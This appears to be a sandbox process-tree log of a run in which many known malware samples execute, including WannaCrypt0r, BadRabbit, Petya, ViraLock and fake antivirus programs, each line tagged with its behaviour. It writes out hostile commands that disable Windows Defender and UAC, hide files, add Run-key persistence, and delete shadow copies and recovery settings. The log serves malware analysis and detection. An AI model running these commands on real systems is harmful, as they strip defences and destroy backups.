
C:\Users\Admin\AppData\Local\Temp\is-COGBM.tmp\is-PBJJ2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-COGBM.tmp\is-PBJJ2.tmp" /SL4 $1025C "C:\Users\Admin\AppData\Local\Temp\Endermanch@RegistrySmart.exe" 779923 55808
3⤵
- Executes dropped EXE
PID:2580

C:\Users\Admin\AppData\Local\Temp\Endermanch@SE2011.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SE2011.exe"
2⤵
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:832

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityCentral.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityCentral.exe"
2⤵
- Executes dropped EXE
PID:2016

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityCentral.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityCentral.exe
3⤵
PID:3468

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityDefender.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityDefender.exe"
2⤵
- Executes dropped EXE
PID:1648

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\ProgramData\6981d600-e615-40eb-abf4-c6062762452e_31.avi", start
3⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityDefener2015.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityDefener2015.exe"
2⤵
- Executes dropped EXE
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 152
3⤵
- Loads dropped DLL
- Program crash
PID:1684

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityScanner.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityScanner.exe"
2⤵
- Executes dropped EXE
PID:1676

C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
3⤵
- Launches sc.exe
PID:948

C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
3⤵
- Launches sc.exe
PID:2276

C:\Users\Admin\AppData\Roaming\rlyqdr.exe
C:\Users\Admin\AppData\Roaming\rlyqdr.exe
3⤵
PID:4200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL
3⤵
PID:4448

C:\Users\Admin\AppData\Local\Temp\Endermanch@SmartDefragmenter.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SmartDefragmenter.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:1980

C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2780

C:\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2060

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2168

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
3⤵
- Loads dropped DLL
PID:2712

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
4⤵
PID:2812

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
5⤵
PID:2192

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
6⤵
PID:3716

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
7⤵
PID:3992

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
8⤵
- Adds Run key to start application
PID:1404

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
9⤵
PID:3556

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
9⤵
- Modifies registry key
PID:2144

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QeIcMUEI.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe""
9⤵
PID:3832

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
10⤵
PID:4880

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:2136

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
9⤵
- Modifies registry key
PID:3924

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
7⤵
- Modifies registry key
PID:2616

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
7⤵
- Modifies registry key
PID:1120

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1408

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\gcIMgYcQ.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe""
7⤵
PID:3396

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
8⤵
PID:2812

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
5⤵
- Modifies registry key
PID:3120

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
5⤵
- Modifies registry key
PID:3128

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3152

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\rMcMQYEM.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe""
5⤵
PID:3180

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
6⤵
PID:3888

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
3⤵
- Modifies registry key
PID:2856

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
3⤵
- Modifies registry key
PID:2928

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3004

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mgcAwUwg.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe""
3⤵
PID:1832

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
4⤵
PID:2172

C:\Users\Admin\AppData\Local\Temp\Endermanch@WannaCrypt0r.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@WannaCrypt0r.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2244

C:\Windows\SysWOW64\attrib.exe
attrib +h .
3⤵
- Views/modifies file attributes
PID:2608

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:2688

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
- Executes dropped EXE
PID:2140

C:\Windows\SysWOW64\cmd.exe
cmd /c 11511664455271.bat
3⤵
PID:2532

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
4⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe co
3⤵
PID:3356

C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
4⤵
PID:3344

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @WanaDecryptor@.exe vs
3⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe vs
4⤵
PID:3668

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
5⤵
PID:3560

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
6⤵
- Interacts with shadow copies
PID:2200

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
PID:4108

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "yqdbhvadqux735" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
3⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
PID:4124

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
PID:4244

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
3⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
3⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
@WanaDecryptor@.exe
3⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\Endermanch@WinlockerVB6Blacksod.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@WinlockerVB6Blacksod.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Endermanch@WinlockerVB6Blacksod.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
3⤵
PID:3592

C:\Users\Admin\AppData\Local\Temp\Endermanch@Xyeta.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Xyeta.exe"
2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Sets file execution options in registry
- Suspicious use of FindShellTrayWindow
PID:2360

C:\Users\Admin\AppData\Local\Temp\Fantom.exe
"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"
3⤵
PID:4348

C:\Users\Admin\AppData\Local\Temp\ose00000.exe
"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"
2⤵
PID:2488

C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
"C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
"C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe"
3⤵
PID:3820

C:\Users\Admin\AppData\Local\Temp\Endermanch@Antivirus.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Antivirus.exe"
3⤵
PID:3856

C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPlatinum.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPlatinum.exe"
3⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPro2017.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPro2017.exe"
3⤵
PID:3900

C:\Users\Admin\AppData\Local\Temp\Endermanch@AnViPC2009.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AnViPC2009.exe"
3⤵
PID:3912

C:\Users\Admin\AppData\Local\Temp\Endermanch@BadRabbit.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@BadRabbit.exe"
3⤵
PID:3932

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
4⤵
PID:3748

C:\Users\Admin\AppData\Local\Temp\Endermanch@Birele.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Birele.exe"
3⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\Endermanch@Cerber5.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Cerber5.exe"
3⤵
PID:3964

C:\Users\Admin\AppData\Local\Temp\Endermanch@DeriaLock.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@DeriaLock.exe"
3⤵
PID:3984

C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe"
3⤵
PID:4040

C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
4⤵
PID:3544

C:\Users\Admin\AppData\Local\Temp\Endermanch@HappyAntivirus.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@HappyAntivirus.exe"
3⤵
PID:4064

C:\Users\Admin\AppData\Local\Temp\Endermanch@InfinityCrypt.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@InfinityCrypt.exe"
3⤵
PID:4076

C:\Users\Admin\AppData\Local\Temp\Endermanch@InternetSecurityGuard.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@InternetSecurityGuard.exe"
3⤵
PID:4084

C:\Users\Admin\AppData\Local\Temp\Endermanch@Krotten.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Krotten.exe"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\Endermanch@LPS2019.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@LPS2019.exe"
3⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield.exe"
3⤵
PID:3268

C:\Users\Admin\AppData\Local\Temp\Endermanch@NoMoreRansom.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@NoMoreRansom.exe"
3⤵
PID:3192

C:\Users\Admin\AppData\Local\Temp\Endermanch@PCDefender.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@PCDefender.exe"
3⤵
PID:3324

C:\Users\Admin\AppData\Local\Temp\Endermanch@Petya.A.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Petya.A.exe"
3⤵
PID:2540

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe"
3⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
4⤵
PID:3124

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
5⤵
PID:3256

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
6⤵
PID:4100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
6⤵
- Modifies registry key
PID:4252

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
6⤵
- Modifies registry key
PID:4404

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jAAcAEQY.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe""
6⤵
PID:4480

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
7⤵
PID:3400

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:4472

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
4⤵
- Modifies registry key
PID:3428

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3644

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PgcAQwkg.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom.exe""
4⤵
PID:2652

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
5⤵
PID:1540

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
4⤵
- Modifies registry key
PID:3476

C:\Users\Admin\AppData\Local\Temp\Endermanch@RegistrySmart.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@RegistrySmart.exe"
3⤵
PID:2204

C:\Users\Admin\AppData\Local\Temp\is-REELM.tmp\is-SE41D.tmp
"C:\Users\Admin\AppData\Local\Temp\is-REELM.tmp\is-SE41D.tmp" /SL4 $10488 "C:\Users\Admin\AppData\Local\Temp\Endermanch@RegistrySmart.exe" 779923 55808
4⤵
PID:4048

C:\Users\Admin\AppData\Local\Temp\Endermanch@SE2011.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SE2011.exe"
3⤵
PID:1488

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityCentral.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityCentral.exe"
3⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityCentral.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityCentral.exe
4⤵
PID:4400

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityDefener2015.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityDefener2015.exe"
3⤵
PID:1004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 152
4⤵
- Program crash
PID:4008

C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityScanner.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@SecurityScanner.exe"
3⤵
PID:3484

C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
4⤵
- Launches sc.exe
PID:4564

C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
4⤵
- Launches sc.exe
PID:4892

C:\Users\Admin\AppData\Roaming\kutmmf.exe
C:\Users\Admin\AppData\Roaming\kutmmf.exe
4⤵
PID:4752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL
4⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe"
3⤵
PID:3504

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe"
3⤵
PID:1092

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
4⤵
PID:3696

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
5⤵
PID:3340

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
6⤵
PID:4192

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
6⤵
- Modifies registry key
PID:4264

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\iEgUwYQI.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe""
6⤵
PID:4372

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
7⤵
PID:3684

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:4364

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
6⤵
- Modifies registry key
PID:4336

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
4⤵
- Modifies registry key
PID:2068

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
4⤵
- Modifies registry key
PID:2332

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3408

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\IIIQIoUw.bat" "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock.exe""
4⤵
PID:3456

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
5⤵
PID:4432

C:\Users\Admin\AppData\Local\Temp\taskse.exe
"C:\Users\Admin\AppData\Local\Temp\taskse.exe"
3⤵
PID:3488

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
"C:\Users\Admin\AppData\Local\Temp\taskdl.exe"
3⤵
PID:2520

C:\Users\Admin\AppData\Local\Temp\ose00000.exe
"C:\Users\Admin\AppData\Local\Temp\ose00000.exe"
3⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\Fantom.exe
"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
3⤵
PID:3144

C:\Users\Admin\AppData\Local\Temp\Endermanch@Xyeta.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Xyeta.exe"
3⤵
PID:3168

C:\Users\Admin\AppData\Local\Temp\Endermanch@WinlockerVB6Blacksod.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@WinlockerVB6Blacksod.exe"
3⤵
PID:3132

C:\Users\Admin\AppData\Local\Temp\Endermanch@WannaCrypt0r.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@WannaCrypt0r.exe"
3⤵
PID:948

C:\Windows\SysWOW64\attrib.exe
attrib +h .
4⤵
- Views/modifies file attributes
PID:2788

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
4⤵
- Modifies file permissions
PID:3328

C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
3⤵
PID:820

C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
"C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe"
3⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\7138496.exe
"C:\Users\Admin\AppData\Local\Temp\7138496.exe"
4⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
"C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe"
4⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\Endermanch@Antivirus.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Antivirus.exe"
4⤵
PID:4944

C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPlatinum.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPlatinum.exe"
4⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPro2017.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AntivirusPro2017.exe"
4⤵
PID:4972

C:\Users\Admin\AppData\Local\Temp\Endermanch@AnViPC2009.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@AnViPC2009.exe"
4⤵
PID:4992

C:\Users\Admin\AppData\Local\Temp\Endermanch@BadRabbit.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@BadRabbit.exe"
4⤵
PID:5008

C:\Users\Admin\AppData\Local\Temp\Endermanch@Birele.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Birele.exe"
4⤵
PID:5032

C:\Users\Admin\AppData\Local\Temp\Endermanch@Cerber5.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Cerber5.exe"
4⤵
PID:5040

C:\Users\Admin\AppData\Local\Temp\Endermanch@DeriaLock.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@DeriaLock.exe"
4⤵
PID:5048

C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@FakeAdwCleaner.exe"
4⤵
PID:5064

C:\Users\Admin\AppData\Local\6AdwCleaner.exe
"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
5⤵
PID:3272

C:\Users\Admin\AppData\Local\Temp\Endermanch@HappyAntivirus.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@HappyAntivirus.exe"
4⤵
PID:5080

C:\Users\Admin\AppData\Local\Temp\Endermanch@InfinityCrypt.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@InfinityCrypt.exe"
4⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\Endermanch@InternetSecurityGuard.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@InternetSecurityGuard.exe"
4⤵
PID:5112

C:\Users\Admin\AppData\Local\Temp\Endermanch@Krotten.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Krotten.exe"
4⤵
PID:4116

C:\Users\Admin\AppData\Local\Temp\Endermanch@Petya.A.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@Petya.A.exe"
4⤵
PID:4304

C:\Users\Admin\AppData\Local\Temp\Endermanch@PCDefender.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@PCDefender.exe"
4⤵
PID:4296

C:\Users\Admin\AppData\Local\Temp\Endermanch@NoMoreRansom.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@NoMoreRansom.exe"
4⤵
PID:3996

C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield.exe"
4⤵
PID:4152

C:\Users\Admin\AppData\Local\Temp\Endermanch@LPS2019.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@LPS2019.exe"
4⤵
PID:4144

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2576 -s 1840
4⤵
- Program crash
PID:3040

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2488

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2052

C:\Windows\system32\conhost.exe
